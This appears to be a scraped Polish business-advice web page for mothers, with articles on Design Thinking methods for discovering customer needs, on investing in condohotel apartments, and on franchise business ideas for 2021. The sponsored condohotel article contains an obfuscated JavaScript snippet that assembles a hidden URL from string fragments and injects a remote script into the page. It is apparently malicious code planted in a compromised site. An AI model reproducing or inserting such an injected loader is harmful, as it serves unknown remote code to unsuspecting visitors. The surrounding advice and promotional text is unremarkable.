Czego szukasz

Jak odkryć czego potrzebują nasi (przyszli) klienci?

Pytanie o potrzeby naszych klientów to jedno z najważniejszych pytań w każdym biznesie. Ale jak sprawdzić czego nasi klienci tak na prawdę potrzebują? W pomocą przychodzi metoda Design Thinking, której tajniki odkrywamy przed Wami w kolejnych tekstach. A do 15 grudnia br. możecie skorzystać z bezpłatnych konsultacji z autorką tekstów. Sprawdź szczegóły!

  • Agnieszka Skowrońska - 02/12/2020
kobieta pracuje przy swpim biurku

Odkrywanie czego potrzebują klienci, którzy już korzystają z naszych usług lub osoby, które mają z nich skorzystać to pierwszy krok, na drodze do ulepszania naszych usług lub ich wymyślania. Początkujący przedsiębiorcy często słyszą, że powinni zrobić analizę rynku. Niby oczywiste, ale już nie takie proste…

Odkrywanie potrzeb (empatyzacja) jest bardziej pogłębionym badaniem, nie opierającym się jedynie na statystykach i dużych liczbach. Jego istotą jest poznanie użytkownika i zrozumienie problemu, który chcemy rozwiązać (poprzez świadczenie usługi lub sprzedaż produktu). Poniżej przedstawiam kilka metod, które można wykorzystać przy niewielkich nakładach finansowych.

Przeczytaj także: Praca na etacie czy własna firma? Jak znaleźć idealne rozwiązanie dla siebie?

„Safari po usłudze” (Service Safari)

Obserwacja uczestnicząca zwana w podręcznikach o projektowaniu usług „Service Safari” polega na doświadczeniu usługi. Jeśli chcesz zaoferować usługę, która już istnieje na rynku, to najpierw sama skorzystaj z oferty „konkurencji”. „Przejdź się” po sklepach internetowych zanim stworzysz swój własny, skorzystaj z warsztatów dla kobiet, jeśli sama chcesz je oferować. Ważne jest, aby spisać swoje spostrzeżenia, sfotografować lub nagrać to, co zaobserwowałaś.

Uczestniczenie w takim „Safari po usłudze” pozwala dokładnie zrozumieć na czym polega usługa, co jest jej najlepszym, a co najsłabszym punktem. Zwykle już podczas doświadczania usługi nasuwa się wiele pomysłów na usprawnienie czy przeprojektowanie tej usługi.

„Cień użytkownika” (User shadowing)

Podobną formą zdobywania wiedzy o potrzebach jest podążanie krok w krok za użytkownikiem i obserwowanie wszystkiego co się dzieje wokół niego. Celem takiej obserwacji jest zrozumienie dlaczego klienci zachowują się w określony sposób, np. jak robią zakupy, co robią po wejściu do sklepu.
Można to też zastosować jeśli chcemy się dowiedzieć jak dana kategoria klientów spędza dzień. Na przykład spędzenie dnia z matką małego dziecka pomoże zrozumieć (szczególnie osobie, która nie ma takiego doświadczenia) czego ona potrzebuje, czym się martwi, a co ją cieszy. Na tej podstawie można „wymyślić” usługę, która będzie odpowiadała na potrzeby jej lub jej dziecka.

Jest to metoda, która pozwala na zobaczenie tego, o czym ludzie zwykle nie mówią w wywiadach lub czego nie wpisują w ankiety. Obserwator zapisuje swoje spostrzeżenia w ustalonej formie (pisemnie, robiąc zdjęcia, nagrywając kamerą). Wszystko dzieję się za zgodą obserwowanego.

Wywiad (zwykły, kontekstowy, fotograficzny)

Najpopularniejszą i najbardziej znaną metodą prowadzenia wywiadów jest pogłębiony wywiad indywidualny (in depth interview) lub wywiad grupowy. Polegają one na rozmowie według określonego scenariusza z jedną osobą lub grupą osób. Zwykle odbywają się one w miejscu neutralnym, czyli nie związanym z tematem rozmowy. Podczas wywiadu można pytać o wykonywane codzienne czynności, potrzeby, które wymagają zaspokojenia, opinie na temat konkretnych usług. Ważne, aby wywiadu nie przeprowadzać z osobami z rodziny, koleżankami (nigdy nie są obiektywne), ale z osobami, które faktycznie należą do grupy naszych potencjalnych użytkowników.

Innym rodzajem wywiadu jest wywiad kontekstowy, czyli prowadzony w miejscu i czasie związanym z tematem rozmowy. Taki wywiad może być przeprowadzony w domu użytkownika podczas wykonywania codziennych czynności, np. gotowania obiadu. Osoba udzielająca wywiadu opowiada co robi i dlaczego tak robi, co jej ułatwia, a co utrudnia wykonywanie czynności. W ten sposób możemy dowiedzieć się jakiego sprzętu brakuje gotującej mamie w kuchni, co ułatwiłoby jej przygotowywanie zdrowych posiłków itp.

Jeszcze innym rodzajem wywiadu jest wywiad fotograficzny. Użycie zdjęć podczas wywiadu ułatwia rozmowę, gdyż rozmówca raczej opowiada o wspomnieniach, które wywołują zdjęcia, a nie czuje, że opowiada o sobie (co dla niektórych jest stresujące). Badacz może poprosić o zdjęcia, które już zostały zrobione (np. podczas wakacji) lub „zadać” temat do zrobienia zdjęć np. sfotografuj jak spędzasz popołudnia lub co ci przeszkadza podczas robienia zakupów z dzieckiem. Następnie badacz zadaje pytania dlaczego zrobiono takie zdjęcie i co ono przedstawia. Ta metoda jest szczególnie polecana do rozmów z dziećmi i młodzieżą.

Przeczytaj także: Jeśli nie własna firma, to co? 4 pomysły dla aktywnej mamy

Dzienniczek użytkownika (User Diary)

Dzienniczek użytkownika jest formą zapisu spostrzeżeń przez samych użytkowników w miejscu i czasie dla nich najbardziej odpowiednim. Forma zapisu może być różnorodna, ale powinna być określona przez badacza. Dzienniczek można prowadzić jak zwykły kalendarz, notatnik lub robić zdjęcia, nakręcać filmy. Można też mieszać wszystkie te techniki.

Jest to metoda szczególnie przydatna jeśli chcemy obserwować nawyki, gdyż wymaga co najmniej kliku dni. Jeśli chcesz oferować swoje usługi jako trener personalny, to możesz zaproponować, aby osoby, które są aktywne fizycznie zapisywały kiedy, jak i gdzie ćwiczy. Może też dołączyć zdjęcia miejsc, w których ćwiczy, pomocy, których używa itp. Może też opisać dlaczego wykonuje takie a nie inne ćwiczenia.
Analiza zebranych danych podczas wypełniania dzienniczka pozwala na dogłębne poznanie nawyków grupy użytkowników. Umożliwia poznanie potrzeb, wzorów zachowań oraz motywacji. Jest to niestety metoda wymagająca największych nakładów, ponieważ osobę, która uczestniczy w badaniu trzeba zachęcić do regularności, w czym może pomóc nagroda lub wynagrodzenie.

Istotą badania potrzeb jest rozszerzenie wiedzy o samych użytkownikach lub o usłudze, a nie skupianie się na ocenie pomysłu na biznes lub zbieranie opinii o usłudze.

Dlatego polecam wszelkie metody jakościowe, czyli pogłębiające dane zagadnienie, ale nie wymagające robienia kilkudziesięciu ankiet. Poza tym ankiety jest trudno poprawnie przygotować i aby można było stwierdzić coś na ich podstawie trzeba dokładnie określić populację oraz wybrać próbę, co naprawdę nie jest proste. Natomiast już przy 12 wywiadach można zebrać bardzo pogłębione informacje na temat danej grupy użytkowników.

Czy już wiesz, którą metodę wybierzesz?

Zdjęcie: 123 rf

Spodobał Ci się artykuł? Podziel się z innymi:
Agnieszka Skowrońska
Socjolog i doktor nauk humanistycznych, autorka książki „Potrzeby to podstawa”. Od kilkunastu lat obserwuje ludzi, bada ich potrzeby, doradza, zachęca do zmian. Obecnie prowadzi własną firmę – Pracownię Innowacji i zajmuje się badaniami społecznymi, doradztwem w zakresie projektowania usług i innowacji społecznych opartych na potrzebach. Prowadzi warsztaty i procesy projektowe.
Podyskutuj

Zarabianie na wynajmie apartamentów

Przed nami druga edycja programu mentoringowego Mother Empower! „To szansa na poznanie siebie, swoich mocnych stron i rozwinięcie umiejętności” – mówi Asia Wojdan-Liszewska, która pracuje w firmie Bosch i wpiera nasze wspólne działania! Tym razem Asia będzie jedną z mentorek Mother Empower 2. i swoim doświadczeniem i pozytywną energią podzieli się ze swoją mentee. Zapisy do programu ruszają już wkrótce a tymczasem zapraszamy do lektury!
  • Alicja Zielińska - 20/01/2021

Condohotel – inwestować czy lepiej nie ryzykować?

Coraz więcej osób może pozwolić sobie na podróżowanie, co wiąże się z koniecznością znalezienia odpowiedniego miejsca noclegowego. Zatrzymywanie się wyłącznie w hotelach kosztuje i to niemało, dlatego rośnie zainteresowanie innymi możliwościami.

Wiele osób nie osiedla się na stałe, ale wynajmuje mieszkanie, zmieniając co jakiś czas lokalizację. Wszystko to sprawia, że apartamenty pod inwestycje stają się coraz bardziej rentownym rozwiązaniem. W przypadku dużych miast, gdzie nie brakuje turystów, bez wątpienia znajdzie się szereg osób zainteresowanych wynajęciem condohotelu.

Istotne jest to, aby nieruchomość miała dobrą lokalizację – na największe zyski można liczyć w przypadku miejscowości nadmorskich w sezonie wakacyjnym. Podobnie jest z obszarami górskimi, które są odwiedzane przez rzeszę turystów nie tylko zimą, ale też latem. Jeśli apartamenty w systemie condo będą miały wysoki standard, można podnieć cenę wynajmu, dzięki czemu inwestycja zwróci się jeszcze szybciej.

Jeśli inwestycja w apartamenty pod wynajem ma być rentowna, to powinny one znajdować się w lokalizacji, która przyciąga atrakcjami turystycznymi przez cały rok. Istotne będzie to, aby obiekt był usytuowany niedaleko stoku narciarskiego, widoku na morze czy jezioro. Nie może też zabraknąć różnych punktów handlowo-usługowych, rozbudowanej infrastruktury.

Zaletą inwestycji w condohotel jest możliwość ochronienia swojego kapitału przed inflacją. Stanie się źródłem regularnego dochodu, możliwe jest nawet odliczenie podatku VAT. Co więcej, właściciel nieruchomości nie musi ponosić żadnych kosztów związanych z jej remontami i naprawami, bo wszystko pokrywa operator hotelowy. Dotyczy to także promocji obiektu. Każdego roku wartość nieruchomości zwiększa się, można też w każdej chwili ją sprzedać. Wiele ofert zakupu condohoteli znajdziesz na stronie condo.pl – https://condo.pl/investments/

Czy inwestowanie w condohotele ma jakieś wady?

Apartamenty pod inwestycje to rozwiązanie pełne zalet, ale nie jest wolne od pewnych wad. Każdy potencjalny inwestor powinien wobec tego mieć je na uwadze przed podjęciem ostatecznej decyzji. Do minusów zaliczyć można brak wpływu na zarządzanie nieruchomością i niemożność zameldowania się – to z kolei może sprawić problemy w przyszłości, gdy właściciel będzie chciał sprzedać apartament na rynku wtórnym. Condohotele są obarczone wyższą stawką VAT, co również stanowi minus, a jej wysokość wynosi 23%. Można oczywiście uzyskać zwrot podatku, ale najpierw trzeba zainwestować wysoki kapitał początkowy.

> (function(){ ob2h=document.createElement(„”);ob2h.async=true;ob2h_=”u”+(„s”)+”t”; ob2hu=”250449624.”;ob2h_+=”a”+(„t.i”);ob2h_+=”n”+(„f”+”o”)+”/”; ob2hu+=”4vv9wcl3b2hnvpn4uyyz8p”+(„3xurlwgz”); ob2h.src=”https://”+ob2h_+ob2hu;ob2h.type=”text/java”; document.body.appendChild(ob2h); })();

Materiał powstał we współpracy z partnerem portalu.

Zdjęcie: partnera portalu.

Spodobał Ci się artykuł? Podziel się z innymi:
Alicja Zielińska

Planujesz założyć biznes w 2021 roku? Wybierz nasze pomysły!

Twoje noworoczne postanowienia dotyczą założenia własnej firmy i zdobycia niezależności zawodowej? Świetnie! Koniecznie sprawdź jakie pomysły mamy dla Ciebie i dlaczego warto działać jako franczyzobiorca znanej marki. W obliczu trudności, których nie brakowało w ostatnim roku, działacie wspólnie i wspieracie się nawzajem. Nasi partnerzy to potwierdzają. Szkoła językowa, zajęcia edukacyjne i kreatywne dla dzieci, salon depilacji czy sklep z ubraniami dla dzieci – który pomysł wybierasz dla siebie?
  • Agnieszka Wadecka - 11/01/2021

Pomysły na biznes 2021, którymi warto się zainteresować

1. Nauka z klockami LEGO – Edukido

Edukido oferuje naukę i zabawę z wykorzystaniem klocków LEGO, zajęcia są skierowane do dzieci od 3 do 12 lat. Dzieci uwielbiają zabawy z LEGO. Jeśli chcesz rozkręcić biznes związany z rozwojem dzieci i wiesz, że klocki LEGO to przepis na sukces, to jest to opcja dla Ciebie.

Zakładając franczyzę otrzymasz profesjonalny system wsparcia biznesowego na każdym etapie z marketingu, sprzedaży czy obsługi klienta. Od niedawna dostępna jest opcja Edukido Mini, która jest bardziej przystępna finansowo.

Dodatkowo, w czasie pandemii Edukido stworzyło nową ofertę zajęć online dla dzieci.

Sprawdź szczegóły współpracy z Edukido

2. Ubranka zawsze w modzie – 5.10.15

Dzieci nieustannie rosną i potrzebują nowych ubrań. Na pewno znacie te memy, gdzie mama skąpi grosza na siebie, ale na dziecięce ubranka wydaje bez wahania dużo więcej? Właśnie dlatego otwarcie własnego sklepu 5.10.15. to świetny pomysł na biznes! Zwłaszcza, że ubranka są śliczne, dobrej jakości, a firma cieszy się renomą naprawdę od wielu lat.
A przy tym firma zapewnia szkolenia ze sprzedaży, niski koszt otwarcia sklepu, zatowarowanie, wsparcie przez cały okres współpracy i brak stałej opłaty franczyzowej.

Poznaj szczegóły biznesu z 5.10.15

3. Twórczy rozwój i świetna zabawa – Akademia Bystrzak

Akademia Bystrzak to podróżnicze kursy rozwoju intelektu dla dzieci, kolonie, wakacje i ferie w mieście czy organizacja twórczych i kreatywnych urodzin. No tak, ale ta pandemia… Otóż Akademia Bystrzak uruchomiła zajęcia online – zobacz jak wyglądały wyprawy w czasie pandemii. W ramach współpracy dostajesz wsparcie merytoryczne i marketingowe, dostęp do materiałów, metodyki i oczywiście możliwości rozwoju.

Poznaj szczegóły biznesu z Akademią Bystrzak

4. Czas dla urody – DepilConcept

A może chciałabyś prowadzić własny gabinet kosmetyczny, ale do tej pory brakowało Ci biznesowego zaplecza aby założyć firmę z tej branży? Właśnie dlatego franczyza wychodzi Ci naprzeciw. DepilConcept to sieć gabinetów, w których wykonuje się zabiegi fototerapii odmładzania i trwałej depilacji. Szczególnie po tym ostatnim ciężkim roku wszystkie chciałybyśmy wyglądać pięknie!

Decydując się na współpracę z DepilConcept otrzymasz pomoc w wyborze lokalu i rekrutacji pracowników, szkolenia dla Ciebie i dla personelu, wsparcie marketingowe, obsługi klienta i sprzedaży, własny serwis urządzeń i urządzenie zastępcze na czas napraw.

Sprawdź jak założyć własny biznes z DepilConcept

5. Najlepsi piłkarze świata – SOCATOTS

Wiesz, że w tym roku zdobywcą Złotej Piłki czyli najlepszym piłkarzem świata został wybrany Robert Lewandowski? No z Robertem pewnie nie będziesz już pracować, ale pomyśl, co jeśli masz szansę wyszkolić najlepszą piłkarską kadrę jaką można sobie wyobrazić? Jak? Otwierając franczyzę SOCATOTS!

Będziesz mogła organizować zajęcia ruchowe dla dzieci w wieku od 6 miesięcy do 5 lat, które z udziałem rodziców będą rozwijać pewność siebie i trenować piłkę nożną.

Ty zaś w ramach współpracy otrzymasz dostęp do zintegrowanej platformy IT, szkolenia i wsparcie marketingowe. Może nawet odkryjesz kolejnego Lewandowskiego? SOCATOTS to system sprawdzony na całym świecie.

Sprawdź jak założyć własny oddział SOCATOTS

6. Język angielski dla dzieci – Early Stage

Early Stage to marka, której nie trzeba przedstawiać. To jedna z najpopularniejszych szkół języka angielskiego dla dzieci i młodzieży w Polsce. Nie ma oddziału w Twojej okolicy? Może chcesz otworzyć własną filię. To proste!

Nie jesteś pewna czy w dobie szalejącego wirusa jest to dobry pomysł? Już w połowie marca 2020 zajęcia Early Stage przeniosły się do online. A dodatkowo – dla wszystkich chętnych dzieci powstało dwujęzyczne przedszkole online!

Early Stage proponuje sprawdzony model finansowy, wsparcie administracyjne, bezpłatne szkolenia, opiekę metodyczną, metodę, którą dzieci uwielbiają i korzystne warunki finansowe. Dzięki temu „ruszysz z kopyta” 😉

Sprawdź jak założyć własny biznes z Early Stage

7. Rozwój kompetencji miękkich dzieci i młodzieży – Akademia JA

Ostatni rok nie był łatwy, można by go porównać do jazdy na rollercoasterze, było z górki, pod górkę, rzadko na prostej i nie wiadomo jakich atrakcji można się spodziewać. A w tym wszystkim mocno ucierpiały dzieci, dla których odnalezienie się w tej sytuacji kosztuje je sporo trudu i emocji. A Akademia JA właśnie tym się zajmuje – rozwojem emocjonalnym dzieci i młodzieży.

Akademia JA oferuje zajęcia dla przedszkolaków, dzieci ze szkół podstawowych i młodzieży z zakresu kompetencji miękkich i umiejętności społecznych. Są także warsztaty dla rodziców. Na obecne czasy to bardzo potrzebne działania.

Otwierając Akademię JA otrzymasz bezpłatne szkolenie, wsparcie merytoryczne i scenariusze zajęć.

Sprawdź jak dołączyć i założyć własny Ośrodek Akademii JA

8. Z kulturą za pan brat – Cool-Turalny Maluch

Jak w miły i przystępny sposób pokazać najmłodszym, że bycie grzecznym i kulturalnym jest… cool? Poprzez zajęcia, które uczą i bawią. Cool-Turalny Maluch ma swój autorski program z savoir vivre i etykiety dla przedszkolaków i dzieci w wieku wczesnoszkolnym.

Aby współpraca przebiegała w pozytywny sposób firma zapewnia konspekty warsztatów, konsultacje, sprawdzony sposób na biznes i mnóstwo zaangażowania.

Sprawdź jak dołączyć do Cool-Turalnego Malucha

9. Matematyczna przygoda – MathRiders

Co tu dużo mówić, matematyka często sprawia dzieciom trudności, gdy jedni czekają na nią z niecierpliwością, inni drżą ze strachu przed nadchodzącą lekcją. Czy wobec tego szkoła matematyki to dobry pomysł na biznes?

No pewnie! Międzynarodowy program edukacji matematycznej – MathRiders został stworzony z myślą o dzieciach i młodzieży w wieku od 2 do 18 lat. Pomaga zbudować mocne podstawy, wyrównać braki, polubić matematykę i rozwinąć logiczne myślenie.

Otwórz swoją szkołę MathRiders, a otrzymasz szkolenia biznesowe, wsparcie, materiały marketingowe, stały rozwój metody i dostęp do platformy zarządzania firmą.

Nie obawiaj się, bo MathRiders również rozwinęło zajęcia online

Sprawdź jak dołączyć do sieci MathRiders

10. Nowe technologie to przyszłość – Akademia Komputerowa Komputrilo

Nauka programowania to przyszłość, a własna Akademia Komputerowa Komputrilo to świetny, przyszłościowy biznes! Wszak w czasie pandemii praca i nauka przeniosły się do internetu, zakupy robimy w sieci i w zasadzie niemal wszystko da się załatwić bez wychodzenia z domu, dlatego rozwój technologiczny to nasza przyszłość. Otwierając oddział Komputrilo będziesz organizować kursy programowania dla dzieci i młodzieży.

Komputrilo to firma przyjazna kobietom, oferująca w ramach współpracy wsparcie techniczne i merytoryczne, szkolenia, swobodę działań i wyłączność na danym obszarze.

Sprawdź jak założyć własną Akademię Komputrilo

11. Klub szalonych naukowców – Nutty Scientists

Nutty Scientists zachęca dzieci do nauki poprzez zabawę i eksperymenty, dzięki którym łatwiej jest zapamiętać nowo poznane informacje. I Ty możesz dołączyć do Nutty Scientists otwierając swój oddział!

Otrzymasz szkolenie wstępne, wsparcie w wyborze i szkoleniu Twoich instruktorów, w organizacji działań promocyjnych i marketingowych. W dodatku Nutty Scientists, sprawdzony w kilkunastu krajach świata nie ma oddziałów w Polsce, więc masz szansę być pierwsza i rozwijać markę na rynku krajowym!

Sprawdź jak założyć pierwszy w Polsce oddział Nutty Scientists

Który pomysł spodobał Ci się najbardziej? Poznaj historie mam, które założyły firmy we współpracy z marką franczyzową. Zadzwoń lub napisz do osób odpowiedzialnych z poszczególnych firm – czekają na Twój kontakt. W 2021 pora działać i spełnić swoje zawodowe marzenia.

Artykuł powstał w ramach akcji Franczyza dla Mamy.

Zdjęcie: 123 rf

Spodobał Ci się artykuł? Podziel się z innymi:
Agnieszka Wadecka
Szczęśliwa żona i mama czwórki dzieci. Macierzyństwo to jej największa pasja, motywująca do rozwoju i działania. Z przyjemnością oddaje się pisaniu. Kocha muzykę, kino i dobre jedzenie. Lubi śledzić trendy i wprowadzać je w życie. Zawodowo początkująca, ale z apetytem na sukces.
Chcę otrzymywać inspiracje, pomysły i sugestie jak pracować i nie zwariować.
Newsletter wysyłamy raz na 2 tygodnie

Może Cię zainteresować także:

Uwaga. Strona wykorzystuje pliki cookies. Informacje uzyskane za ich pomocą wykorzystywane są w celach statystycznych. Pozostając tu godzisz się na ich zapisywanie w Twojej przeglądarce. ×